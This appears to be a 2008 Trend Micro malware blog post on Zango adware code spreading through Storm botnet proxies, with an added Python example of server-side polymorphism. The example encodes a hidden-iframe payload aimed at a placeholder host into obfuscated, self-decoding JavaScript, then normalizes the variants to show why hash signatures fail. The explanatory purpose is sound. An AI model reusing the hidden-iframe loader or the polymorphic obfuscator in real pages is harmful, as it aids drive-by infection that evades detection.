
Zango and Storm: Possibly in Cahoots | TrendLabs | Malware Blog - by Trend Micro


Zango and Storm: Possibly in Cahoots

May 15th, 2008 by Macky Cruz (Technical Communications)

When security researchers encounter a piece of code, they often have little idea of its ultimate objective. Analysts have to play online gumshoe to trace how a single file fits into what is very often a multi-component attack.

Storm has been in the foreground for quite some time as the primary example of how widespread (and undetected) zombified computers have become. Whenever analysts discuss the Internet's role in enabling organized crime, the Storm botnet comes to mind. Several reports in the past few months point to Storm's various nefarious activities:

Now we are beginning to see Zango-related code being passed around and distributed among known Storm proxies.

One of these files, now detected as TROJ_MUTANT.BN, is an AdPack kit that contains a file named zango.php. Within it are CLSIDs resembling those that Zango and Hotbar routines install or modify.

The other PHP files, detected as either JS_AGENT.BB or PHP_MPHAK.AL, appear to be products of signature detection's arch-enemy: server-side polymorphism. With this technique the malicious server regenerates a slightly different version of the file (technically a new variant) for each request it receives, typically from an infected computer, so that no two downloads share the same hash or byte-level signature even though their behaviour is identical.
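To make the point concrete, here is an added example (not code from the original post, and not the code of JS_AGENT.BB or PHP_MPHAK.AL) that emulates a server-side polymorphic generator in Python and shows why hash-based signatures lose against it. The payload, the XOR-array encoding format, the junk-comment layer and the `example.invalid` host are all constructed for illustration; the regex-based `normalize()` step stands in for the emulation or generic unpacking a scanner would actually perform.

```python
import hashlib
import random
import re
import string
from typing import List, Tuple

# Constructed stand-in for the behaviour a polymorphic server wants every
# victim to execute. Illustration only: not the code of JS_AGENT.BB or
# PHP_MPHAK.AL, and the host name is a reserved-TLD placeholder.
CORE_PAYLOAD = (
    'document.write("<iframe src=\\"http://example.invalid/ld\\" '
    'width=0 height=0></iframe>");'
)


def _ident(rng: random.Random) -> str:
    """Random JavaScript identifier, the kind a polymorphic engine emits."""
    head = rng.choice(string.ascii_letters)
    tail = "".join(rng.choice(string.ascii_letters + string.digits)
                   for _ in range(rng.randrange(3, 9)))
    return head + tail


def polymorph(payload: str, rng: random.Random) -> str:
    """Emulate server-side polymorphism: one payload, re-encoded per request.

    Each call draws a fresh XOR key, fresh identifier names and a fresh junk
    comment, so the bytes of the served file (and therefore its hash) change
    on every download while the decoded behaviour stays identical.
    """
    key = rng.randrange(1, 256)
    arr, out, idx = _ident(rng), _ident(rng), _ident(rng)
    encoded = ",".join(str(ord(ch) ^ key) for ch in payload)
    junk = "/*" + "".join(rng.choice(string.ascii_lowercase)
                          for _ in range(rng.randrange(4, 20))) + "*/"
    return (
        f"{junk}var {arr}=[{encoded}];var {out}='';"
        f"for(var {idx}=0;{idx}<{arr}.length;{idx}++)"
        f"{{{out}+=String.fromCharCode({arr}[{idx}]^{key});}}"
        f"eval({out});"
    )


# These patterns assume the toy format produced by polymorph() above.
_ARRAY_RE = re.compile(r"=\[([0-9,]+)\];")
_KEY_RE = re.compile(r"\]\^(\d+)\)")


def normalize(variant: str) -> str:
    """Strip the cosmetic layer and decode the XOR array.

    Stands in for what an emulator or generic unpacker does inside a
    scanner: every variant is mapped back to one canonical form. A real
    unpacker would execute the script in a sandbox rather than pattern-match.
    """
    stripped = re.sub(r"/\*.*?\*/", "", variant, flags=re.S)
    arr_m = _ARRAY_RE.search(stripped)
    key_m = _KEY_RE.search(stripped)
    if not arr_m or not key_m:
        return stripped  # not in the expected shape; hand back unchanged
    key = int(key_m.group(1))
    return "".join(chr(int(n) ^ key) for n in arr_m.group(1).split(","))


def file_hash(data: str) -> str:
    """Byte-level signature: what a plain hash blocklist would store."""
    return hashlib.sha256(data.encode()).hexdigest()


def behaviour_hash(variant: str) -> str:
    """Signature over the normalized form, stable across variants."""
    return file_hash(normalize(variant))


def serve(n_requests: int, seed: int) -> List[str]:
    """Simulate n downloads from the polymorphic server (seeded for replay)."""
    rng = random.Random(seed)
    return [polymorph(CORE_PAYLOAD, rng) for _ in range(n_requests)]


def compare(n_requests: int = 5, seed: int = 2008) -> Tuple[int, int]:
    """Count distinct file hashes vs distinct behaviour hashes over n downloads."""
    variants = serve(n_requests, seed)
    return (len({file_hash(v) for v in variants}),
            len({behaviour_hash(v) for v in variants}))


if __name__ == "__main__":
    files, behaviours = compare()
    print(f"{files} distinct file hashes, {behaviours} distinct behaviour hash")
```

Five simulated downloads yield five different file hashes but a single behaviour hash. That is the practical lesson of server-side polymorphism: a detection keyed to the bytes of one sample will miss the next download, so the scanner has to match on what the file does after unpacking (or on the server hosting it), not on what it looks like.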

The presence of these clues suggests one of two possibilities: either Storm is now targeting computers that have Zango adware installed, or Storm has been commissioned to deploy Zango adware. Zango (also known as ePIPO, 180solutions and HotBar) is an adware company notorious for planting software that runs at startup, displays advertisements, and comes bundled with other software.

Users whose computers are under the control of a botnet often have no idea that their machines are involved in any of the botnet's current activities. It therefore falls to users to make sure not only that they are not infected by these botnet agents (by using adequate and up-to-date Web threat protection) but also that their machines are not being used to carry out online theft and fraud.
